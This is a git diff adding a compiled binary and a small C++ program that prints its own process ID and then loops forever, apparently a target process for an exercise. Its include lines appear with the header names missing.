diff --git a/01/project-hbj/target b/01/project-hbj/target
new file mode 100755
index 0000000..60be9d0
Binary files /dev/null and b/01/project-hbj/target differ
diff --git a/01/project-hbj/target.cpp b/01/project-hbj/target.cpp
new file mode 100644
index 0000000..9345a20
--- /dev/null
+++ b/01/project-hbj/target.cpp
@@ -0,0 +1,16 @@
+
+#include
+#include
+#include
+#include
+
+int main()
+{
+ pid_t pid = getpid();
+ std::cout << "Pid: " << pid << std::endl;
+
+ while(true)
+ {
+ sleep(0);
+ }
+}
\ No newline at end of file